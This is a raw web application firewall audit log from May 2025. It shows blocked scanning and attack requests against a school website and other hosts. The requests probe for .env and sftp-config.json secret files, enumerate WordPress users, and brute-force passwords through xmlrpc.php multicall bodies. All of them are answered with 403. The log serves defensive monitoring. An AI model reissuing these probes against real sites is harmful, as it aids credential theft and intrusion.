"/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748409173124910 790 (- - -) Stopwatch2: 1748409173124910 790; combined=297, p1=259, p2=0, p3=0, p4=0, p5=38, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e474d09-Z-- --b8a46f0a-A-- [28/May/2025:12:33:48 +0700] aDagPA3r-0gDryHAyD_EYwAAAFE 103.236.140.4 36000 103.236.140.4 8181 --b8a46f0a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 124.153.19.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 124.153.19.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b8a46f0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8a46f0a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748410428309337 3677 (- - -) Stopwatch2: 1748410428309337 3677; combined=1655, p1=553, p2=1054, p3=0, p4=0, p5=48, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8a46f0a-Z-- --b04f304e-A-- [28/May/2025:13:35:26 +0700] aDaurvnnEwDNUSjDseIWOAAAAIg 103.236.140.4 36360 103.236.140.4 8181 --b04f304e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.36.206.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.36.206.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b04f304e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b04f304e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748414126141257 3580 (- - -) Stopwatch2: 1748414126141257 3580; combined=1509, p1=538, p2=938, p3=0, p4=0, p5=32, sr=138, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b04f304e-Z-- --ca709025-A-- [28/May/2025:13:38:22 +0700] aDavXuszXCullgn3bbGmQAAAAAE 103.236.140.4 36400 103.236.140.4 8181 --ca709025-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 164.92.244.132 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 164.92.244.132 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --ca709025-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca709025-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748414302532560 895 (- - -) Stopwatch2: 1748414302532560 895; combined=366, p1=332, p2=0, p3=0, p4=0, p5=34, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca709025-Z-- --c3513e32-A-- [28/May/2025:13:52:03 +0700] aDaykw3r-0gDryHAyD_EqQAAAEI 103.236.140.4 36490 103.236.140.4 8181 --c3513e32-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.183.83.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.183.83.84 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c3513e32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3513e32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748415123354077 2862 (- - -) Stopwatch2: 1748415123354077 2862; combined=1183, p1=417, p2=741, p3=0, p4=0, p5=25, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3513e32-Z-- --8739314d-A-- [28/May/2025:14:16:12 +0700] aDa4PPnnEwDNUSjDseIWSwAAAIc 103.236.140.4 36606 103.236.140.4 8181 --8739314d-B-- GET /sftp-config.json HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 51.44.7.141 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 51.44.7.141 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --8739314d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8739314d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748416572763467 938 (- - -) Stopwatch2: 1748416572763467 938; combined=352, p1=310, p2=0, p3=0, p4=0, p5=42, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8739314d-Z-- --692fec6f-A-- [28/May/2025:14:31:43 +0700] aDa73xwBHP_x2VCWa06BtgAAAMI 103.236.140.4 36710 103.236.140.4 8181 --692fec6f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 147.182.137.182 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 147.182.137.182 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --692fec6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --692fec6f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748417503533910 889 (- - -) Stopwatch2: 1748417503533910 889; combined=371, p1=325, p2=0, p3=0, p4=0, p5=45, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --692fec6f-Z-- --60caab44-A-- [28/May/2025:15:05:38 +0700] aDbD0uszXCullgn3bbGmlwAAAAQ 103.236.140.4 37012 103.236.140.4 8181 --60caab44-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.28.242.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.28.242.148 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --60caab44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --60caab44-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748419538819955 3198 (- - -) Stopwatch2: 1748419538819955 3198; combined=1390, p1=495, p2=863, p3=0, p4=0, p5=32, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60caab44-Z-- --6997b66c-A-- [28/May/2025:15:24:59 +0700] aDbIW-szXCullgn3bbGmrgAAABA 103.236.140.4 37158 103.236.140.4 8181 --6997b66c-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 34.143.249.229 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 34.143.249.229 Accept-Encoding: gzip X-Varnish: 169286952 --6997b66c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6997b66c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748420699233156 809 (- - -) Stopwatch2: 1748420699233156 809; combined=325, p1=285, p2=0, p3=0, p4=0, p5=39, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6997b66c-Z-- --bb889276-A-- [28/May/2025:15:24:59 +0700] aDbIWw3r-0gDryHAyD_E1QAAAE8 103.236.140.4 37166 103.236.140.4 8181 --bb889276-B-- GET /sendgrid/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 34.143.249.229 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 34.143.249.229 Accept-Encoding: gzip X-Varnish: 169286955 --bb889276-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bb889276-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748420699382818 827 (- - -) Stopwatch2: 1748420699382818 827; combined=312, p1=274, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb889276-Z-- --39f05039-A-- [28/May/2025:15:24:59 +0700] aDbIW_nnEwDNUSjDseIWbAAAAIs 103.236.140.4 37174 103.236.140.4 8181 --39f05039-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 34.143.249.229 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 34.143.249.229 Accept-Encoding: gzip X-Varnish: 169286958 --39f05039-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --39f05039-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748420699511450 714 (- - -) Stopwatch2: 1748420699511450 714; combined=269, p1=233, p2=0, p3=0, p4=0, p5=36, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39f05039-Z-- --a290a100-A-- [28/May/2025:15:44:31 +0700] aDbM7xwBHP_x2VCWa06B8gAAANM 103.236.140.4 37346 103.236.140.4 8181 --a290a100-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Opera/9.30 (Nintendo Wii; U; ; 2047-7; en) Accept-Charset: utf-8 --a290a100-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a290a100-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748421871433009 900 (- - -) Stopwatch2: 1748421871433009 900; combined=400, p1=362, p2=0, p3=0, p4=0, p5=38, sr=160, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a290a100-Z-- --4c8e7271-A-- [28/May/2025:15:49:14 +0700] aDbOChwBHP_x2VCWa06B_gAAANA 103.236.140.4 37398 103.236.140.4 8181 --4c8e7271-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-AU) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IT Accept-Charset: utf-8 --4c8e7271-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c8e7271-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748422154639430 759 (- - -) Stopwatch2: 1748422154639430 759; combined=311, p1=272, p2=0, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c8e7271-Z-- --3e6f9c2a-A-- [28/May/2025:16:07:03 +0700] aDbSN_nnEwDNUSjDseIWmQAAAIs 103.236.140.4 37764 103.236.140.4 8181 --3e6f9c2a-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 154.72.27.50 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 154.72.27.50 X-Forwarded-Proto: http Connection: close Content-Type: text/html; charset=utf-8 --3e6f9c2a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e6f9c2a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748423223937156 862 (- - -) Stopwatch2: 1748423223937156 862; combined=318, p1=280, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e6f9c2a-Z-- --afd64b3b-A-- [28/May/2025:16:19:52 +0700] aDbVOBwBHP_x2VCWa06E9AAAANE 103.236.140.4 49900 103.236.140.4 8181 --afd64b3b-B-- GET / HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 111.119.193.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 111.119.193.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.4 Safari/532.1 Proxy-Connection: close --afd64b3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --afd64b3b-H-- Message: Access denied with code 403 (phase 2). Matched phrase "/Proxy-Connection/" at TX:header_name. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "33"] [id "210740"] [rev "2"] [msg "COMODO WAF: HTTP header is restricted by policy||smkn22-jkt.sch.id|F|4"] [data "/Proxy-Connection/"] [severity "WARNING"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748423992014848 2327 (- - -) Stopwatch2: 1748423992014848 2327; combined=1070, p1=444, p2=595, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --afd64b3b-Z-- --013c211b-A-- [28/May/2025:17:00:23 +0700] aDbet_nnEwDNUSjDseIkLgAAAI8 103.236.140.4 36352 103.236.140.4 8181 --013c211b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 84.247.150.34 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 84.247.150.34 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --013c211b-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel#2020 --013c211b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --013c211b-E-- --013c211b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 84.247.150.34 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748426423677273 5664 (- - -) Stopwatch2: 1748426423677273 5664; combined=4128, p1=473, p2=3491, p3=0, p4=0, p5=97, sr=84, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --013c211b-Z-- --0a9c804e-A-- [28/May/2025:17:10:22 +0700] aDbhDhwBHP_x2VCWa06Q1QAAAME 103.236.140.4 36906 103.236.140.4 8181 --0a9c804e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 62.210.124.187 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 62.210.124.187 X-Forwarded-Proto: https Connection: close Content-Length: 490 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0a9c804e-C-- system.multicallmethodNamewp.getUsersBlogsparamsrizalfadil!rizalfadil! --0a9c804e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a9c804e-E-- --0a9c804e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 62.210.124.187 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748427022321866 5741 (- - -) Stopwatch2: 1748427022321866 5741; combined=4631, p1=521, p2=3830, p3=0, p4=0, p5=156, sr=84, sw=124, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a9c804e-Z-- --2fb29c76-A-- [28/May/2025:17:20:46 +0700] aDbjfg3r-0gDryHAyD_UcgAAAEo 103.236.140.4 37744 103.236.140.4 8181 --2fb29c76-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 222.253.125.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 222.253.125.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2fb29c76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2fb29c76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748427646983321 3155 (- - -) Stopwatch2: 1748427646983321 3155; combined=1421, p1=467, p2=923, p3=0, p4=0, p5=31, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2fb29c76-Z-- --70a59c0d-A-- [28/May/2025:17:32:42 +0700] aDbmSg3r-0gDryHAyD_U1gAAAEM 103.236.140.4 38596 103.236.140.4 8181 --70a59c0d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 178.254.241.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.254.241.152 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --70a59c0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70a59c0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 